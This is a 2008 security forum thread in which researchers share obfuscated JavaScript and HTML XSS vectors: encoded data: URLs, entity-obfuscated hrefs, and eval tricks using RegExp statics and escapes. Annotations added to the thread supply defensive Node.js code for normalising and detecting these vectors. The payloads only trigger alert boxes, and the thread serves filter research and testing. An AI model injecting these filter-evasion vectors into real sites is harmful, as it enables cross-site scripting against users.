Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 09:51AM

I've been reading the ECMA spec because I'm bored:-

Function('a','\al\ert(a)')(1)

The above calls functions and arguments with a string

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: January 28, 2008 10:12AM

I was looking at E4X last night:
a='alert';eval(<{a}>{a}</{a}>+'(a)') 

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 28, 2008 10:18AM

Here is a RegExp trick:-

'xxxalert(1)'.match(/[^x]+/);
eval(RegExp['$&'])

The RegExp object is open to information disclosure in Firefox as it's possible to return text matched from FF extensions if they use the object.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 28, 2008 10:50AM

eval(String(/\x61\x6c\x65\x72\x74\x28\x31\x29/.exec(/zzzzalert(1)/)));

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: January 28, 2008 11:16AM

@Gareth:

Nice find - the RegExp object can indeed be used to access data which shouldn't be available IMHO:

function foo () {
  var abc = '123456'.match(/(\d)(\d)/)  // sets RegExp.$1 = '1', RegExp.$2 = '2', RegExp.lastMatch = '12'
  var def = window
}

function bar() {
  console.dir(RegExp)        // the regex info from foo() is still readable here
  console.dir(typeof abc)    // "undefined": foo()'s locals are out of scope (a bare abc would throw ReferenceError)
  console.dir(typeof def)    // "undefined"
}

foo()
bar()

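The cross-scope leak shown in the post above is not a 2008 Firefox curiosity: the legacy static properties (`RegExp.$1`..`$9`, `RegExp.lastMatch` / `RegExp['$&']`, `RegExp.input` / `RegExp['$_']`) are still present in every major engine and are realm-wide, so anything that ran a regex leaves its last match readable by unrelated code in the same page. The following is an added example, not code from the thread, runnable under Node.js. It uses a constructed API-key format and value; the validator, the reader and the scrub helper are assumptions for the demo.

```javascript
// Added example (not from the thread): legacy RegExp static properties leak the
// last match across function boundaries within a realm, and a throwaway match
// is the cheapest way to clear them. Runs under Node.js.

// Constructed sample: a validator that matches a secret inside its own scope.
// The match result is a local; nothing is returned or stored except true/false.
function validateApiKey(apiKey) {
  const m = /^sk_(live|test)_([a-z0-9]{8})$/.exec(apiKey);
  return m !== null;
}

// Unrelated code, run later by anything in the same realm (an injected script,
// a third-party widget): reads what the last regex match captured.
function readLeakedMatch() {
  return {
    wholeMatch: RegExp.lastMatch,  // same value as RegExp['$&']
    input: RegExp.input,           // same value as RegExp['$_']
    group1: RegExp.$1,
    group2: RegExp.$2,
  };
}

// Mitigation: overwrite the statics with a throwaway match before control
// leaves the sensitive function. lastMatch, input and $1..$9 all become ''.
function scrubRegExpStatics() {
  /^(.*)$/.exec('');
}

function validateApiKeySafely(apiKey) {
  try {
    return validateApiKey(apiKey);
  } finally {
    scrubRegExpStatics();
  }
}

// Drives both variants and returns what a later reader would see after each.
function demo() {
  const secret = 'sk_live_a1b2c3d4';   // constructed value
  validateApiKey(secret);
  const leaked = readLeakedMatch();     // leaked.wholeMatch === secret
  validateApiKeySafely(secret);
  const afterScrub = readLeakedMatch(); // afterScrub.wholeMatch === ''
  return { leaked, afterScrub };
}
```

The statics are per realm, so an iframe or a worker does not see the parent document's matches; the exposure is to any script running in the same realm, which is exactly the XSS situation. Scrubbing only helps if every regex over secret data does it, so the more robust habit is to keep regexes away from secrets (compare tokens with a constant-time equality instead of a pattern).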
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 29, 2008 04:26AM

document.@x = function() {
alert(1);
}
document.@x();

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 31, 2008 09:53AM

A nice way to clone an object:-
function clone(obj) {
 return eval(uneval(obj)); // uneval() is non-standard and Firefox-only
}

Usage:-
o1 = {test:'hello1'};
o2 = clone(o1);
alert(o1.test);
alert(o2.test);
o2.test = 'hello2';
alert(o1.test);
alert(o2.test);




Edited 1 time(s). Last edit at 01/31/2008 09:53AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: ma1
Date: January 31, 2008 11:17AM

@Gareth:
nice, why not "Javizing" JS this way, then:
Object.prototype.clone = function() {
  return eval(uneval(this));
}
alert("test".clone());
alert((3).clone());
alert(clone.clone());

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 31, 2008 11:39AM

@ma1

Yep good idea, I was just providing a small example though based on a small js hacking library I've been working on which is gonna be prototyped and more OO.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 01, 2008 04:22AM

This works in Opera, maybe others:-

<script src="data:text/javascript,alert(1)"></script>

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 01, 2008 06:33AM

Found this link on John Resig's blog:-
http://google-caja.googlecode.com/svn/changes/mikesamuel/string-interpolation-29-Jan-2008/trunk/src/js/com/google/caja/interp/index.html

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: February 06, 2008 08:35PM

This is a little silly. Nothing particularly exciting, just ridiculous to see that it works in FF.

[_=(/al/ig)[-1]+(/ert/mgi)[1-2]][(/ev/img)[-1]+(/al/gimmi)[-Math.cos(0)]](_).valueOf()(1)

Haha!
-Dan

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 07, 2008 04:15AM

Data urls tricks:-

<a href=data&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>test</a>
<a href=&#x20&#100&#97&#116&#97&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>test</a>

<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>

This one shows that FF reads base64 and ignores every character after until the payload:-
<a href=dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64a&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>Test</a>

Another example:-
<a href=dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64ANYTHING&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4>Test</a>

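The vectors above get past a filter that looks for the literal string `data:text/html` because the attribute value is only assembled after the HTML parser decodes the numeric character references (with the trailing `;` omitted) and the URL parser strips leading whitespace. The following is an added example, not part of the post, runnable under Node.js: it performs those two normalisation steps, then parses the `data:` URL with the same leniency about the `base64` token that the post reports for Firefox, so the decoded payload can be inspected. The sample href values are the ones from the post; `inspectHref`, `SCRIPTABLE` and the helper names are assumptions for the demo.

```javascript
// Added example (not from the thread): normalise an href the way a browser does
// before deciding whether it is a data: URL that carries HTML, and decode its
// payload. Runs under Node.js (Buffer is used for base64).

// Numeric character references, trailing ';' optional, which is exactly what the
// vectors rely on ("&#x3a" for ':', "&#59b" for ';b'). Named references are not
// needed for these samples and are left untouched.
function decodeNumericEntities(s) {
  return s.replace(/&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?/g, (_, hex, dec) =>
    String.fromCodePoint(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// Parse a data: URL into media type, base64 flag and decoded payload.
// Deliberately lenient, mirroring the Firefox behaviour noted in the post: a
// parameter that merely *starts* with "base64" ("base64a", "base64ANYTHING")
// switches on base64 decoding. The WHATWG data: URL processor requires the last
// parameter to be exactly "base64", so a strict parser would treat those two
// payloads as percent-encoded text instead.
function parseDataUrl(href) {
  const url = href.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, ''); // URL parser strips C0 controls and space
  const m = /^data:([^,]*),([\s\S]*)$/i.exec(url);
  if (m === null) return null;
  const [mediaType, ...params] = m[1].split(';');
  const isBase64 = params.some(p => /^base64/i.test(p.trim()));
  let body;
  if (isBase64) {
    body = Buffer.from(m[2], 'base64').toString('utf8');
  } else {
    try { body = decodeURIComponent(m[2]); } catch { body = m[2]; }
  }
  return { mediaType: (mediaType.trim() || 'text/plain').toLowerCase(), isBase64, body };
}

// Media types a browser renders as a document in which script can run.
const SCRIPTABLE = new Set(['text/html', 'application/xhtml+xml', 'image/svg+xml']);

// Full pipeline: entity decode -> URL parse -> classify.
function inspectHref(rawHref) {
  const normalised = decodeNumericEntities(rawHref);
  const parsed = parseDataUrl(normalised);
  return { normalised, parsed, scriptable: parsed !== null && SCRIPTABLE.has(parsed.mediaType) };
}

// Constructed samples: the href values from the post above.
const SAMPLES = [
  'data&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4',
  '&#x20&#100&#97&#116&#97&#x3atext/html&#59b&#x61se6&#x34&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4',
  'data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4',
  'dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64a&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4',
  'dat&#x61&#x3atext&#x2fhtml&#x3b&#59base64ANYTHING&#x2cPHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4',
];

function inspectSamples() {
  return SAMPLES.map(inspectHref);
}
```

Every one of the five samples normalises to a `text/html` data: URL whose payload decodes to `<script>alert(/XSS/)</script>`; the lesson for a filter is that it has to decode to the same representation the browser will act on before matching anything. Current Firefox and Chrome refuse top-level navigation to `data:` URLs initiated by page content, but still render them inside `<iframe>`, `<object>` and `<embed>`, so the `<iframe src=data:...>` form in the post remains the relevant one.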
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 16, 2008 05:05AM

Hehe awesome!

http://ejohn.org/blog/most-bizarre-ie-quirk/

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 22, 2008 02:10PM

x=[1,2,3].input=alert,4,5
x(1)

x=[].x=[].y=alert
x(1)




Edited 1 time(s). Last edit at 02/22/2008 02:17PM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 22, 2008 07:11PM

Waldo has some awesome examples:-

({}).valueOf.call(null).alert('lose');

[].sort.call(null).alert('lose')

({}.constructor.prototype.toString=function(){return "f".constructor.fromCharCode(95,95,112,97,114,101,110,116,95,95);}, y={},y[{}].alert('lose'))

Nice one Waldo

Some more awesome examples available here:-
http://stuff.mit.edu/iap/facebook/slides2/

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: February 29, 2008 06:03AM

eval(/a......./.exec(/#####alert(1)#####/)[0])

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 03, 2008 03:01AM


/./(".")['ev'+''+''+'al']('a'+'ler'+'t(1)')

Re: New XSS vectors/Unusual Javascript
Posted by: fragge
Date: March 03, 2008 04:15PM

Gareth Heyes Wrote:
-------------------------------------------------------
> Hehe awesome!
>
> http://ejohn.org/blog/most-bizarre-ie-quirk/


Hey, is it even remotely possible to add code within the alert box itself? This is something I've just thought of.. I'd have to dig through the IE libraries to work out exactly what's happening when a JS alert box is called, but I'm sure it would be possible to add malicious code to a box, if not from a web app then by hooking IE and changing the call yourself.. Just a thought :)

edit: what's wrong with this?

&lt;\sc\r\ipt&gt;ale\u0072t('SS\x58'.&#x73;&#x70;&#x6c;&#x69;&#x74;('').&#114;&#101;&#118;&#101;&#114;&#115;&#101;().&#x6a;&#x6f;&#105;&#110;(''))&lt;\/\sc\r\ipt&gt;

it renders as

<\sc\r\ipt>ale\u0072t('SS\x58'.split('').reverse().join(''))<\/\sc\r\ipt>

:\



Edited 2 time(s). Last edit at 03/03/2008 09:47PM by fragge.

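Several vectors in this thread hide the sink behind JavaScript-level escapes rather than HTML ones: `ale\u0072t` is a valid spelling of the identifier `alert` (Unicode escapes are allowed in identifiers), `'SS\x58'` is the string `SSX`, `'\al\ert(a)'` in Gareth's `Function(...)` vector is `alert(a)` because `\a` and `\e` are identity escapes in a non-strict string literal, and `/\x61\x6c\x65\x72\x74\x28\x31\x29/` is the regex `/alert(1)/`. The following is an added example, not from the thread, runnable under Node.js: a normaliser that resolves those escape forms so a filter sees what the engine will see, with the raw and decoded views of the thread's own vectors. `unescapeJs`, `mentionsSink` and `analyseVectors` are names assumed for the demo.

```javascript
// Added example (not from the thread): undo JavaScript escape sequences that hide
// a sink name from a text filter. Handles \uXXXX and \u{...} (valid in identifiers
// and strings), \xHH (strings and regex literals) and identity escapes such as \a
// or \l, which a non-strict string literal treats as the bare character.
// An escaped backslash (\\) is consumed first so that "\\u0061" is NOT decoded.
// Standard escapes (\n, \t, quotes, octal digits) are left alone. Regex classes
// such as \d would be flattened to 'd'; that is acceptable for a filter view.
function unescapeJs(src) {
  const re = /\\\\|\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([^0-9xu\\'"bfnrtv\r\n])/g;
  return src.replace(re, (m, uBrace, u4, x2, identity) => {
    if (m === '\\\\') return m;                                   // keep escaped backslash
    if (uBrace !== undefined) return String.fromCodePoint(parseInt(uBrace, 16));
    if (u4 !== undefined) return String.fromCharCode(parseInt(u4, 16));
    if (x2 !== undefined) return String.fromCharCode(parseInt(x2, 16));
    return identity;                                              // \a -> a, \e -> e, \l -> l
  });
}

// The kind of check a naive filter does: is the sink called by name?
function mentionsSink(src, sink = 'alert') {
  return new RegExp('\\b' + sink + '\\s*\\(').test(src);
}

// Constructed samples: the escape-based vectors from this thread, as JS source text.
const VECTORS = [
  "Function('a','\\al\\ert(a)')(1)",
  "eval(String(/\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29/.exec(/zzzzalert(1)/)));",
  "ale\\u0072t('SS\\x58'.split('').reverse().join(''))",
];

// For each vector: what the filter sees raw, what the engine sees, and whether
// the sink check fires on each view.
function analyseVectors(vectors = VECTORS) {
  return vectors.map(raw => {
    const decoded = unescapeJs(raw);
    return { raw, decoded, flaggedRaw: mentionsSink(raw), flaggedDecoded: mentionsSink(decoded) };
  });
}
```

The point is the asymmetry: the raw check misses all three vectors and the same check on the decoded text catches all three. Note that this is a filter-side approximation, not a JavaScript parser; a real tokenizer would additionally have to know whether it is inside a string, a regex literal or an identifier, which is why signature-based detection of obfuscated script stays fragile.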
Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: March 04, 2008 05:40PM

P=function(a,b){return Math.pow(a,b)}
e=''
for(i=1;i<5;i++){e+=String.fromCharCode((35/3)*P(i,3)-89*P(i,2)+(607/3)*i-24)}
document.location.toSource()[e]('ale'+'rt(1)')

Tee-hee-hee

-Dan

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: March 04, 2008 08:35PM

@DoctorDan: nerd! :)

Re: New XSS vectors/Unusual Javascript
Posted by: thrill
Date: March 04, 2008 10:28PM

Have I mentioned that sometimes you guys really worry me? ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: New XSS vectors/Unusual Javascript
Posted by: Malkav
Date: March 05, 2008 02:49AM

@thrill, we already had gareth adding dingbat conversion for hackvertor at the wee hours of morning, which are detected without problems by php-ids's centrifuge, and now Dan is producing vectors from beyond. And you are worried *sometimes*? :)

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin

Re: New XSS vectors/Unusual Javascript
Posted by: thrill
Date: March 05, 2008 11:57AM

Yes, just *sometimes*, but only while I'm awake.

--thrill

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 05, 2008 04:44PM

Quote

vectors from beyond

Hehe - right indeed. This is an animal of a vector - hats off, Doc!

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 06, 2008 10:32AM

window[Boolean[-6][5]+Boolean[-6][3]+Boolean[-6][4]+String[-6][2]+String[-6][1]](1)

Works for any global object :D
a=0[eval[-6]](alert[-6])
a(1)

Here's how to create a string from any function name:-

function Anything(){}
alert(Anything[-6]); // alerts the string "Anything"




Edited 3 time(s). Last edit at 03/06/2008 10:39AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: March 06, 2008 04:26PM

Can someone please explain this to me?

i=alert;(i[-5]['eval'](i))(1)

i=alert
(i[-5]['eval'](i))(1)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: March 06, 2008 04:32PM

@mario

Hehe yeah I can explain....

[-5] is a secret property that stores the number of arguments of a function; this can also be obtained using the length property on a function. The [-5] property returns 1 because that is the maximum number of arguments. Because it returns a Number object, eval is attached (it's attached to all objects in Firefox).

Re: New XSS vectors/Unusual Javascript
Posted by: asilvermtzion
Date: March 06, 2008 07:08PM

how in the name of all things did you come across that property, nice work tho

Re: New XSS vectors/Unusual Javascript
Posted by: fragge
Date: March 06, 2008 10:09PM

@asilvermtzion: When it was found that using a property of -1 did something weird with intervals in IE (I think this is what sparked it, I'm not sure), Gareth did some poking around and found that there are hidden properties in the negative, the most useful (imo) being -6 for the name of the object/function being used. Quite cool :) There's a function for finding some of them (I haven't tried it) on the thespanner.co.uk homepage.
